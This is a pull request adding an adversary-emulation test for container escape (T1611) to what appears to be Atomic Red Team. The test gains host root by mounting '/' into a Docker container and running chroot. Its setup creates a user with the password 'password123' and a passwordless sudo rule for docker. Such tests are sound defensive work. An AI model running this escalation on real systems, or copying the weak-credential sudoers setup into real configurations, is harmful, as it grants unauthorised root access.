### PR TITLE
New Atomic - Privilege Escalation via Docker Volume Mapping

### DIFF
--- a/atomics/T1611/T1611.yaml
+++ b/atomics/T1611/T1611.yaml
@@ -143,3 +143,39 @@ atomic_tests:
       rm #{mount_point}#{cron_path}/#{cron_filename}
       umount #{mount_point}
       rmdir #{mount_point}
+- name: Privilege Escalation via Docker Volume Mapping
+  description: |
+    This test demonstrates privilege escalation by abusing Docker's volume mapping
+    feature to gain access to the host file system. By mounting the root directory
+    of the host into a Docker container, the attacker can use chroot to operate as
+    root on the host system.
+  supported_platforms:
+    - containers
+  executor:
+    name: sh
+    elevation_required: true
+    command: |
+      echo "Current user: #{username}"
+      sudo -u docker_user sh -c "sudo docker run -v /:/mnt --rm --name t1611_privesc -it alpine chroot /mnt id"
+    cleanup_command: |
+      USERNAME="#{username}"; SUDOERS_FILE="/etc/sudoers.d/$USERNAME"; id "$USERNAME" &>/dev/null && userdel -r "$USERNAME" && echo -e "$USERNAME is deleted."; [[ -f "$SUDOERS_FILE" ]] && rm -f "$SUDOERS_FILE"; echo "Cleanup complete."
+  dependencies:
+    - description: Docker
+      prereq_command: |
+        command -v docker &> /dev/null && echo "Docker is installed" || { echo "Docker is not installed."; exit 1; }
+      get_prereq_command: |
+        echo "You should install docker manually."
+    - description: Docker Privileged User
+      prereq_command: |
+        sudo -l -U #{username} | grep "(ALL) NOPASSWD: /usr/bin/docker"
+      get_prereq_command: |
+        USERNAME="#{username}"
+        PASSWORD="password123"
+        SUDO_COMMAND="/usr/bin/docker"
+        SUDOERS_FILE="/etc/sudoers.d/$USERNAME"
+        [[ $EUID -ne 0 ]] && echo "Run as root." && exit 1; id "$USERNAME" &>/dev/null || { useradd -m -s /bin/bash "$USERNAME" && echo "$USERNAME:$PASSWORD" | chpasswd; }; [[ -f "$SUDOERS_FILE" ]] || { echo "$USERNAME ALL=(ALL) NOPASSWD: $SUDO_COMMAND" > "$SUDOERS_FILE" && chmod 440 "$SUDOERS_FILE"; }; echo "Setup complete. User: $USERNAME, Password: $PASSWORD"
+  input_arguments:
+    username:
+      default: docker_user
+      description: Username that run attack command
+      type: string

--- a/atomics/T1611/T1611.yaml
+++ b/atomics/T1611/T1611.yaml
@@ -151,14 +151,11 @@ atomic_tests:
     root on the host system.
   supported_platforms:
     - containers
-  executor:
-    name: sh
-    elevation_required: true
-    command: |
-      echo "Current user: #{username}"
-      sudo -u docker_user sh -c "sudo docker run -v /:/mnt --rm --name t1611_privesc -it alpine chroot /mnt id"
-    cleanup_command: |
-      USERNAME="#{username}"; SUDOERS_FILE="/etc/sudoers.d/$USERNAME"; id "$USERNAME" &>/dev/null && userdel -r "$USERNAME" && echo -e "$USERNAME is deleted."; [[ -f "$SUDOERS_FILE" ]] && rm -f "$SUDOERS_FILE"; echo "Cleanup complete."
+  input_arguments:
+    username:
+      default: docker_user
+      description: Username that run attack command
+      type: string
   dependencies:
     - description: Docker
       prereq_command: |
@@ -174,8 +171,11 @@ atomic_tests:
         SUDO_COMMAND="/usr/bin/docker"
         SUDOERS_FILE="/etc/sudoers.d/$USERNAME"
         [[ $EUID -ne 0 ]] && echo "Run as root." && exit 1; id "$USERNAME" &>/dev/null || { useradd -m -s /bin/bash "$USERNAME" && echo "$USERNAME:$PASSWORD" | chpasswd; }; [[ -f "$SUDOERS_FILE" ]] || { echo "$USERNAME ALL=(ALL) NOPASSWD: $SUDO_COMMAND" > "$SUDOERS_FILE" && chmod 440 "$SUDOERS_FILE"; }; echo "Setup complete. User: $USERNAME, Password: $PASSWORD"
-  input_arguments:
-    username:
-      default: docker_user
-      description: Username that run attack command
-      type: string
+  executor:
+    name: sh
+    elevation_required: true
+    command: |
+      echo "Current user: #{username}"
+      sudo -u docker_user sh -c "sudo docker run -v /:/mnt --rm --name t1611_privesc -it alpine chroot /mnt id"
+    cleanup_command: |
+      USERNAME="#{username}"; SUDOERS_FILE="/etc/sudoers.d/$USERNAME"; id "$USERNAME" &>/dev/null && userdel -r "$USERNAME" && echo -e "$USERNAME is deleted."; [[ -f "$SUDOERS_FILE" ]] && rm -f "$SUDOERS_FILE"; echo "Cleanup complete."


### PR DESCRIPTION
**Details:**
This atomic test demonstrates a privilege escalation attack leveraging Docker's volume mapping feature. By mounting the root directory of the host into a Docker container, the attacker can use the `chroot `command to access the host system as root. The test highlights the risks associated with granting excessive permissions to Docker users. It includes commands for setting up and cleaning up the environment, ensuring accurate execution and proper cleanup.

**Testing:**

- Verified that the Docker installation is detected as a prerequisite.
- Confirmed that the user running the test has the required NOPASSWD permissions for Docker.
- Successfully executed the command to mount the host root directory and escalate privileges using chroot.
- Ensured the cleanup command removes any test-created users and configurations.

Screenshot:

![image](https://github.com/user-attachments/assets/c9d7755b-4185-457a-ae37-0024a74235c8)
